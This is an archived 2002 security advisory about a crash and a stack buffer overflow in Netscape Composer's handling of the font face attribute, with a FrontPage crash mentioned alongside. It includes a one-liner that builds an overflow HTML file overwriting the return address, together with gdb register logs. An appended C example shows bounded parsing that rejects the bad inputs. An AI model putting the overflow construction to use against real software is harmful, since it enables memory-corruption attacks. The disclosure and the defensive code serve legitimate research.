Microsoft FrontPage vs Composer Netscape...

From: S[h]iff - [ISR] - Infobyte Security Research (sh1ffat_private)
Date: Thu Jun 13 2002 - 04:31:03 PDT


    :::                [ISR]                 :::
    ::: Infobyte Security Research :::
     ::    www.infobyte.com.ar     ::
             ::::::::::::::::::::::::::::::
    
    
    .::Software Affected: 
    
     - Microsoft FrontPage 98 
     - Composer, Netscape 4.77/U.S ..(< or > ??)..
    
    .::Type of Problem:
    
     - Design Error
     - Buffer Overflow
    
    .::Problem:
    
    * Design Error:
    ----------
    
    When an HTML file is created that contains,
    for example:
    
    ------------------------------
    <html>
    <body>
    
    <font face="">Hola!</font>
    
    </body>
    </html>
    ------------------------------
    
    FrontPage and Composer crash
    because of bad handling of <font face="">
    (blank arguments).
    
    
    * Buffer Overflow :
    -----------------
    
    Composer contains an unchecked buffer
    for the face attribute; if you put an argument
    of >= 191 bytes it overwrites part of memory,
    
    for example:
    
    ------------------------------
    <html>
    <body>
    
    <font face="AAAAAAAAAAAA..[191]">Hola!</font>
    
    </body>
    </html>
    ------------------------------
    (A >= 191)
    
    --------
    [ gdb logs ]
    --------
    
    (gdb) set args '-composer'
    (gdb) run
    Starting program: /usr/bin/netscape '-composer'
    
    Program received signal SIGSEGV, Segmentation fault.
    0x846e6bb in CEditElement::SetTagData () at eval.c:88
    (gdb) info all-registers
    eax            0x0      0
    ecx            0xffffffff       -1
    edx            0x90a3be0        151665632
    ebx            0x90a3be0        151665632
    esp            0xbfffe0d4       0xbfffe0d4
    ebp            0xbfffe0e4       0xbfffe0e4
    esi            0x12147820       303331360
    edi            0x12147820       303331360
    eip            0x846e6bb        0x846e6bb
    eflags         0x10246  66118
    
    
    * But the program begins to overwrite the return address
    when A = 197 bytes; check this!
    
    # printf "<html>\n<body>\n<font face=\"`perl -e 'printf "A"x197'``perl -e 'printf "\x78\x56\x34\x12"'`\"> Hola! </font>\n</body>\n</html>" >> source.htm
    
    The created source.htm contains:
    
    ---------------------------
    <html>
    <body>
    
    <font face="AAAAAAAAAAAA..[197][ret address 0x12345678]">Hola!</font>
    
    </body>
    </html>
    ---------------------------
    
    
     -------
    [ gdb logs ]
     -------
    
    
    # gdb netscape
    
    (gdb) set args '-composer'
    (gdb) run
    Starting program: /usr/bin/netscape '-composer'
    
     * "Here the program loads the HTML file with AAA.. in the face argument"
    
    Program received signal SIGSEGV, Segmentation fault.
    [[0x12345678]] in ?? () at eval.c:88
    
    (gdb) info all-registers
    eax            0x9003e22        151010850
    ecx            0x0      0
    edx            0x25c00900       633342208
    ebx            0x90a39a0        151665056
    esp            0xbfffe0c0       0xbfffe0c0
    [ebp            0x41414141       0x41414141]
    esi            0x90d6000        151871488
    edi            0xbfffe0ec       -1073749780
    [eip            0x12345678       0x12345678]
    eflags         0x10246  66118
    
    
    I checked these b0fs on Slackware 8.0, and netscape isn't installed setuid
    root by default.
    I didn't check other distributions.
    Sorry for my poor English.
    
    Salutes  ``S[h]iff``
    [ISR] - Crew! Mal0r..
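A bounded extractor for the face attribute, added here as an example and not code from the advisory, Netscape or FrontPage: it refuses both inputs the post describes (an empty value, and a value of 191 bytes or more) instead of copying them into a fixed buffer. The limit FACE_MAX and the names copy_face, check_font_tag and check_face_len are assumptions for this example, chosen to match the advisory's 191-byte figure.

```c
#include <stdio.h>
#include <string.h>

#define FACE_MAX 190   /* assumed cap: the advisory reports corruption at >= 191 bytes */

enum face_status { FACE_OK, FACE_MISSING, FACE_EMPTY, FACE_TOO_LONG };

/* Extract the face="..." value of one tag into out (capacity outsz).
 * Never writes more than outsz bytes; NUL-terminates on FACE_OK. */
enum face_status copy_face(const char *tag, char *out, size_t outsz)
{
    const char *start = strstr(tag, "face=\"");
    if (start == NULL)
        return FACE_MISSING;
    start += strlen("face=\"");
    const char *end = strchr(start, '"');
    if (end == NULL)
        return FACE_MISSING;           /* unterminated attribute: treat as absent */
    size_t len = (size_t)(end - start);
    if (len == 0)
        return FACE_EMPTY;             /* the "design error" input: <font face=""> */
    if (len > FACE_MAX || len >= outsz)
        return FACE_TOO_LONG;          /* the overflow input: refuse instead of copying */
    memcpy(out, start, len);           /* bounded: len < outsz was checked above */
    out[len] = '\0';
    return FACE_OK;
}

/* Classify a whole tag using a destination sized for FACE_MAX. */
enum face_status check_font_tag(const char *tag)
{
    char face[FACE_MAX + 1];
    return copy_face(tag, face, sizeof face);
}

/* Build a constructed tag whose face value is n 'A's (capped at 400) and
 * classify it; mirrors the advisory's AAAA..[191] and AAAA..[197] test files. */
enum face_status check_face_len(size_t n)
{
    char tag[448];
    if (n > 400)
        n = 400;
    char *p = tag + sprintf(tag, "<font face=\"");
    memset(p, 'A', n);
    strcpy(p + n, "\">Hola!</font>");
    return check_font_tag(tag);
}
```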
    



    This archive was generated by hypermail 2b30 : Thu Jun 13 2002 - 17:15:47 PDT